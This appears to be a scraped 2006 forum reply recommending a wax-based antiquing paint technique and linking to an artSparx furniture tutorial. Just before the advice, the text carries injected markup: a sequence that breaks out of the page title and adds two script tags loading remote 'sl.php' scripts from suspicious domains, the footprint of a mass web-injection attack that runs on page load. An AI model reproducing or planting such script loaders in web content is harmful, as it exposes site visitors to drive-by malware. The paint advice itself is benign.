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2/6/2006 10:19:33 PM
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"> </title><script src="http://zon.menotepoer.com/sl.php?v=2"></script><!--"></title><script src="http://esscer47emonyno.rr.nu/sl.php"></script><!--Sounds like the technique you are interested in is a traditional antiquing method that incorporates waxes to allow the under color to show through in a distressed fashion. Please visit the artSparx Furniture Center and review the tutorial at http://www.artsparx.com/antiquecabinets.asp.
Thought the color recommendations in the step-by-step tutorial may be different from the look you are trying to achieve, the technique is the same. You can simple substitute a different top color of paint while following the rest of instructions.
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